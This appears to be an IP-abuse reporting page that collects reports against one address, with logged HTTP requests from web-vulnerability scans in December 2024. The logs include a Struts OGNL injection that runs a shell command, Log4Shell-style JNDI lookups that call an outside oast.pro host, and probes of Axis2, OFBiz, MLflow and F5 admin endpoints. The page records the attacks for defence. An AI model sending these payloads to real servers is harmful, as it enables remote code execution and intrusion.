This IP address has been reported a total of 40
times from 4 distinct
sources.
94.72.114.60 was first reported on ,
and the most recent report was .
Recent Reports:
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
Reporter
IoA Timestamp in UTC
Comment
Categories
Anonymous
Aggressive web scan
Web App Attack
Anonymous
Aggressive web scan
Web App Attack
Anonymous
Aggressive web scan
Web App Attack
Anonymous
Aggressive web scan
Web App Attack
Anonymous
10 unauthorised HTTP requests.
Full list: https://rentry.co/intrusion-watch-report-373691<br ... show more10 unauthorised HTTP requests.
Full list: https://rentry.co/intrusion-watch-report-373691
Sample record:
HTTP Req: GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Time: Tue, 17 Dec 2024 05:12:11 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 443
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
IP suspected 242 time(s) so far. show less
HackingBad Web BotWeb App Attack
Anonymous
HTTP Req: POST /axis2/axis2-admin/login HTTP/1.1
Time: Tue, 17 Dec 2024 03:21:14 +0100
... show moreHTTP Req: POST /axis2/axis2-admin/login HTTP/1.1
Time: Tue, 17 Dec 2024 03:21:14 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 443
User Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
IP suspected 233 time(s) so far. show less
HackingBad Web BotWeb App Attack
Anonymous
HTTP Req: POST /axis2-admin/login HTTP/1.1
Time: Tue, 17 Dec 2024 03:21:14 +0100
Unaut ... show moreHTTP Req: POST /axis2-admin/login HTTP/1.1
Time: Tue, 17 Dec 2024 03:21:14 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 443
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.23
IP suspected 233 time(s) so far. show less
HackingBad Web BotWeb App Attack
Anonymous
HTTP Req: GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-194%7D%24%7B%3A-293%7D.%2 ... show moreHTTP Req: GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-194%7D%24%7B%3A-293%7D.%24%7BhostName%7D.uri.ctfbt9b7739g4k54ah50maw6obs4d9de7.oast.pro%2F%7D HTTP/1.1
Time: Tue, 17 Dec 2024 03:15:55 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 443
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
IP suspected 233 time(s) so far. show less
HackingBad Web BotWeb App Attack
Anonymous
HTTP Req: GET /solr/admin/collections?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-194%7D%24%7B%3A-293 ... show moreHTTP Req: GET /solr/admin/collections?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-194%7D%24%7B%3A-293%7D.%24%7BhostName%7D.uri.ctfbt9b7739g4k54ah50owhpwmct14igu.oast.pro%2F%7D HTTP/1.1
Time: Tue, 17 Dec 2024 03:15:55 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 443
User Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
IP suspected 233 time(s) so far. show less
HackingBad Web BotWeb App Attack
Anonymous
13 unauthorised HTTP requests.
Full list: https://rentry.co/intrusion-watch-report-373634<br ... show more13 unauthorised HTTP requests.
Full list: https://rentry.co/intrusion-watch-report-373634
Sample record:
HTTP Req: POST /context.json HTTP/1.1
Time: Tue, 17 Dec 2024 02:48:08 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 443
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23
IP suspected 228 time(s) so far. show less
HackingBad Web BotWeb App Attack
Anonymous
13 unauthorised HTTP requests.
Full list: https://rentry.co/intrusion-watch-report-373618<br ... show more13 unauthorised HTTP requests.
Full list: https://rentry.co/intrusion-watch-report-373618
Sample record:
HTTP Req: POST /webtools/control/SOAPService HTTP/1.1
Time: Tue, 17 Dec 2024 02:41:33 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 443
User Agent: Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0
IP suspected 215 time(s) so far. show less
HackingBad Web BotWeb App Attack
Anonymous
Aggressive web scan
Web App Attack
Anonymous
HTTP Req: POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Time: Sat, 14 Dec 2024 05:01: ... show moreHTTP Req: POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Time: Sat, 14 Dec 2024 05:01:39 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 443
User Agent: Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 SUSE/6.0.428.0 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1
IP suspected 202 time(s) so far. show less
HackingBad Web BotWeb App Attack
Anonymous
HTTP Req: POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Time: Sat, 14 Dec 2024 04:25: ... show moreHTTP Req: POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Time: Sat, 14 Dec 2024 04:25:47 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 443
User Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
IP suspected 201 time(s) so far. show less
HackingBad Web BotWeb App Attack
Anonymous
HTTP Req: POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
Time: Sat, 14 Dec 2024 03:32:32 +0 ... show moreHTTP Req: POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
Time: Sat, 14 Dec 2024 03:32:32 +0100
Unauthorised web server access and/or looking for web app vulnerabilities.
Port 443
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
IP suspected 200 time(s) so far. show less